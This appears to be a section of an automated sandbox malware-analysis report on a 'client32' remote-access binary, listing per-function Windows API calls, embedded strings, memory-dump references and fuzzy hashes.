6bec6dac-6bec6ded call 6beb9310 2988->2989 2995 6bec6f3a-6bec6f46 call 6beb30a0 2989->2995 2996 6bec6df3-6bec6e58 GetTickCount InterlockedExchange call 6bed3753 call 6bed3c10 2989->2996 2994->2976 3001 6bec6f47-6bec6f4c call 6beba4e0 2995->3001 3006 6bec6e5a-6bec6e5b 2996->3006 3007 6bec6e8b-6bec6e99 call 6bec28d0 2996->3007 3001->2987 3009 6bec6e5d-6bec6e74 call 6beb6f50 3006->3009 3010 6bec6e76-6bec6e89 call 6beb94e0 3006->3010 3012 6bec6e9e-6bec6ea4 3007->3012 3016 6bec6ea7-6bec6ebd call 6bec77e0 3009->3016 3010->3012 3012->3016 3019 6bec6ebf-6bec6f1d InterlockedDecrement SetEvent call 6bed31a0 call 6beb5c90 3016->3019 3020 6bec6f25-6bec6f38 call 6beb30a0 3016->3020 3027 6bec6da0-6bec6da6 3019->3027 3028 6bec6f23 3019->3028 3020->3001 3027->2989 3028->2987
                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEC6BD5
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEC6C26
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 6BEC6C5B
                                                                                                                    • Part of subcall function 6BEC6940: GetTickCount.KERNEL32 ref: 6BEC6950
                                                                                                                  • WaitForSingleObject.KERNEL32(0000030C,?), ref: 6BEC6C7C
                                                                                                                  • _memmove.LIBCMT ref: 6BEC6C93
                                                                                                                  • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6BEC6CB4
                                                                                                                  • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6BEC6CD9
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEC6CEC
                                                                                                                  • _calloc.LIBCMT ref: 6BEC6D76
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEC6DF3
                                                                                                                  • InterlockedExchange.KERNEL32(02B034BA,00000000), ref: 6BEC6E01
                                                                                                                  • _calloc.LIBCMT ref: 6BEC6E33
                                                                                                                  • _memmove.LIBCMT ref: 6BEC6E47
                                                                                                                  • InterlockedDecrement.KERNEL32(02B03462), ref: 6BEC6EC3
                                                                                                                  • SetEvent.KERNEL32(00000314), ref: 6BEC6ECF
                                                                                                                  • _memmove.LIBCMT ref: 6BEC6EF4
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEC6F4F
                                                                                                                  • InterlockedExchange.KERNEL32(02B03402,-6BEFA188), ref: 6BEC6F60
                                                                                                                  Strings
                                                                                                                  • httprecv, xrefs: 6BEC6BDD
                                                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6BEC6E62
                                                                                                                  • ReadMessage returned FALSE. Terminating connection, xrefs: 6BEC6F3A
                                                                                                                  • ProcessMessage returned FALSE. Terminating connection, xrefs: 6BEC6F25
                                                                                                                  • ResumeTimeout, xrefs: 6BEC6BBA
                                                                                                                  • FALSE, xrefs: 6BEC6E67
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                                                  • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                                                  • API String ID: 1449423504-919941520
                                                                                                                  • Opcode ID: 8cc41213762e4cdac4044ba130ffaafacd63c2c8abe2c8fd127e1ad85ae8d717
                                                                                                                  • Instruction ID: d8eac146312834122623b7059c7cb86c7c8b3ca68978ae7a0b0a385cbdabf870
                                                                                                                  • Opcode Fuzzy Hash: 8cc41213762e4cdac4044ba130ffaafacd63c2c8abe2c8fd127e1ad85ae8d717
                                                                                                                  • Instruction Fuzzy Hash: 11B1C4B1D002549FDB20CF24DE45BEB73B8EB89348F2041D9E559A7240D7B89AC4CF92
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEC33A0 Relevance: 29.1, APIs: 2, Strings: 17, Instructions: 571COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: wsprintf
                                                                                                                  • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247$r<k
                                                                                                                  • API String ID: 2111968516-1135366504
                                                                                                                  • Opcode ID: 2f07eac22c60bb859a42d2600604bbfddd79f4d962b9aa65635012b5c69ad956
                                                                                                                  • Instruction ID: 4fd457ec5ffff23f944164af4eb7afa265458fee13d36d8971221fde75f71be0
                                                                                                                  • Opcode Fuzzy Hash: 2f07eac22c60bb859a42d2600604bbfddd79f4d962b9aa65635012b5c69ad956
                                                                                                                  • Instruction Fuzzy Hash: 862281B2E00258ABDB21CF64CD80EEAB3BDAB4A304F1485D9E55D67640DB395F84CF52
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 111031C0 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 153COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 111031EE
                                                                                                                  • EnterCriticalSection.KERNEL32(111EB5C4), ref: 111031F7
                                                                                                                  • GetTickCount.KERNEL32 ref: 111031FD
                                                                                                                  • GetTickCount.KERNEL32 ref: 11103250
                                                                                                                  • LeaveCriticalSection.KERNEL32(111EB5C4), ref: 11103259
                                                                                                                  • GetTickCount.KERNEL32 ref: 1110328A
                                                                                                                  • LeaveCriticalSection.KERNEL32(111EB5C4), ref: 11103293
                                                                                                                  • EnterCriticalSection.KERNEL32(111EB5C4), ref: 111032BC
                                                                                                                  • LeaveCriticalSection.KERNEL32(111EB5C4,00000000,?,00000000), ref: 11103383
                                                                                                                    • Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
                                                                                                                    • Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
                                                                                                                    • Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507
                                                                                                                    • Part of subcall function 110EE9B0: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11103327,?), ref: 110EE9DB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2551133808.0000000011000000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2594884509.00000000111EB000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000111F1000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011205000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011257000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001127C000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011283000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001128A000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011297000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112A7000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112AD000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112D9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011325000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
                                                                                                                  • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                                                                  • API String ID: 1574099134-3013461081
                                                                                                                  • Opcode ID: b039da78e7f60a0956db5c69d50db6548e5713577cffa5e4926f0cc6d21667ef
                                                                                                                  • Instruction ID: 89832f748e922a403c2406022f27e5a031cf170e04c986d8c3432455018c83f9
                                                                                                                  • Opcode Fuzzy Hash: b039da78e7f60a0956db5c69d50db6548e5713577cffa5e4926f0cc6d21667ef
                                                                                                                  • Instruction Fuzzy Hash: 1E41C479E1465AAFCB01DFA59C84EEFFBB5AF04358B404526F905E7640EA30A900CBA1
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEB7610 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ioctlsocket.WSOCK32 ref: 6BEB7642
                                                                                                                  • connect.WSOCK32(00000000,?,?), ref: 6BEB7659
                                                                                                                  • WSAGetLastError.WSOCK32(00000000,?,?), ref: 6BEB7660
                                                                                                                  • _memmove.LIBCMT ref: 6BEB76D3
                                                                                                                  • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6BEB76F3
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEB7717
                                                                                                                  • ioctlsocket.WSOCK32 ref: 6BEB775C
                                                                                                                  • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEB7762
                                                                                                                  • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6BEB777A
                                                                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6BEB778B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                                                  • String ID: *BlockingIO$ConnectTimeout$General
                                                                                                                  • API String ID: 4218156244-2969206566
                                                                                                                  • Opcode ID: e420b3a77f5de270d5597e6c5442d3f9017c8347465d2798473ecbfdcf46e71d
                                                                                                                  • Instruction ID: f34da31523b48dd708e0b03e547938217dd804416fc6697e07e87f89583b775b
                                                                                                                  • Opcode Fuzzy Hash: e420b3a77f5de270d5597e6c5442d3f9017c8347465d2798473ecbfdcf46e71d
                                                                                                                  • Instruction Fuzzy Hash: 0641DD71D003249BE720DBB4CD49BDE73BAAF44309F2045DDE50997141EBBC9A56CBA2
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 11131370 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 111417E0: _memset.LIBCMT ref: 11141825
                                                                                                                    • Part of subcall function 111417E0: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114183E
                                                                                                                    • Part of subcall function 111417E0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141865
                                                                                                                    • Part of subcall function 111417E0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141877
                                                                                                                    • Part of subcall function 111417E0: FreeLibrary.KERNEL32(00000000), ref: 1114188F
                                                                                                                    • Part of subcall function 111417E0: GetSystemDefaultLangID.KERNEL32 ref: 1114189A
                                                                                                                  • AdjustWindowRectEx.USER32(1113DB48,00CE0000,00000001,00000001), ref: 111313B7
                                                                                                                  • LoadMenuA.USER32(00000000,000003EC), ref: 111313C8
                                                                                                                  • GetSystemMetrics.USER32(00000021), ref: 111313D9
                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 111313E1
                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 111313E7
                                                                                                                  • GetDC.USER32(00000000), ref: 111313F3
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 111313FE
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 1113140A
                                                                                                                  • CreateWindowExA.USER32(00000001,NSMWClass,02712B00,00CE0000,80000000,80000000,1113DB48,?,00000000,?,11000000,00000000), ref: 1113145F
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,110F5809,00000001,1113DB48,_debug), ref: 11131467
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2551133808.0000000011000000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2594884509.00000000111EB000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000111F1000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011205000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011257000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001127C000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011283000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001128A000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011297000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112A7000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112AD000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112D9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011325000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                                                  • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                                  • API String ID: 1594747848-1114959992
                                                                                                                  • Opcode ID: 7281dd7751e614175c8dce41f6d5c7d8aafef09e31021395c24f009c96aa77ba
                                                                                                                  • Instruction ID: 9cc38207800c48755d7f962ceed396d8e742c52f1043c8e55726c054ea069f44
                                                                                                                  • Opcode Fuzzy Hash: 7281dd7751e614175c8dce41f6d5c7d8aafef09e31021395c24f009c96aa77ba
                                                                                                                  • Instruction Fuzzy Hash: 6C31A072E00319AFDB109FE58C84BBFFBB8EB48719F104528FA11B7284D67069408BA5
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEB8D00 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 144COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6BEC67B5), ref: 6BEB8D6B
                                                                                                                    • Part of subcall function 6BEB4F70: LoadLibraryA.KERNEL32(psapi.dll,?,6BEB8DC8), ref: 6BEB4F78
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 6BEB8DCB
                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6BEB8DD8
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 6BEB8EBF
                                                                                                                    • Part of subcall function 6BEB4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6BEB4FC4
                                                                                                                    • Part of subcall function 6BEB4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6BEB8E0D,00000000,?,6BEB8E0D,00000000,?,00000FA0,?), ref: 6BEB4FE4
                                                                                                                  • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6BEB8EAE
                                                                                                                    • Part of subcall function 6BEB5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6BEB5014
                                                                                                                    • Part of subcall function 6BEB5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6BEB8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6BEB5034
                                                                                                                    • Part of subcall function 6BEB2420: _strrchr.LIBCMT ref: 6BEB242E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$AddressFileLibraryModuleNameProc$ChangeCloseCurrentEnumFindFreeLoadModulesNotificationOpen_strrchr
                                                                                                                  • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                                                  • API String ID: 3028219403-3484705551
                                                                                                                  • Opcode ID: 2ee0beee34eeb8a9373904579fbd7e9e541ecbcc53ac8a382814bea10526b5f7
                                                                                                                  • Instruction ID: f0e9b147733a6c4959afcbeada5d72692648356fb245c2fc2bc5e2866b6aa221
                                                                                                                  • Opcode Fuzzy Hash: 2ee0beee34eeb8a9373904579fbd7e9e541ecbcc53ac8a382814bea10526b5f7
                                                                                                                  • Instruction Fuzzy Hash: C041CA71E002199BDB10CB61ED45FEA77BCEF95709F200499EA15A3340E778EA45CF61
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 1110D180 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
                                                                                                                    • Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
                                                                                                                    • Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507
                                                                                                                  • std::exception::exception.LIBCMT ref: 1110D1EA
                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 1110D1FF
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1110D216
                                                                                                                  • InitializeCriticalSection.KERNEL32(-00000010,?,110309CC,00000001,00000000), ref: 1110D229
                                                                                                                  • InitializeCriticalSection.KERNEL32(111EB8A0,?,110309CC,00000001,00000000), ref: 1110D238
                                                                                                                  • EnterCriticalSection.KERNEL32(111EB8A0,?,110309CC), ref: 1110D24C
                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,110309CC), ref: 1110D272
                                                                                                                  • LeaveCriticalSection.KERNEL32(111EB8A0,?,110309CC), ref: 1110D2FF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2551133808.0000000011000000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2594884509.00000000111EB000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000111F1000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011205000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011257000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001127C000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011283000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001128A000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011297000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112A7000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112AD000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112D9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011325000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                  • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                                  • API String ID: 1976012330-1024648535
                                                                                                                  • Opcode ID: a9464cb0e0a99456cff2a8d3bc78cbc6792874f259f81f545d4ceebd7879f5bc
                                                                                                                  • Instruction ID: 3950031055ca146543af7cdf1b279fa91d633e3444a8efa468e47cc8be7809bd
                                                                                                                  • Opcode Fuzzy Hash: a9464cb0e0a99456cff2a8d3bc78cbc6792874f259f81f545d4ceebd7879f5bc
                                                                                                                  • Instruction Fuzzy Hash: DD41CFB4E01215AFDB12CFA98C84FAEFBF4FB48708F54853AE419D7344E635A5008BA1
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEC2F80 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 115COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _calloc.LIBCMT ref: 6BEC2FBB
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEC300D
                                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 6BEC301B
                                                                                                                  • _calloc.LIBCMT ref: 6BEC303B
                                                                                                                  • _memmove.LIBCMT ref: 6BEC3049
                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 6BEC307F
                                                                                                                  • SetEvent.KERNEL32(00000314,?,?,?,?,?,?,?,?,?,?,?,?,?,?,941034B3), ref: 6BEC308C
                                                                                                                    • Part of subcall function 6BEC28D0: wsprintfA.USER32 ref: 6BEC2965
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                                                  • String ID: a3k$a3k
                                                                                                                  • API String ID: 3178096747-2515680799
                                                                                                                  • Opcode ID: 591d586ace468c367697f2cfdcd8f3c02fdce152b0cab662d0af8d0068fcdcab
                                                                                                                  • Instruction ID: 3807391ab35f485629c3deb8ea17ecd92db2b1a725aef5c00513f3bf6688aabe
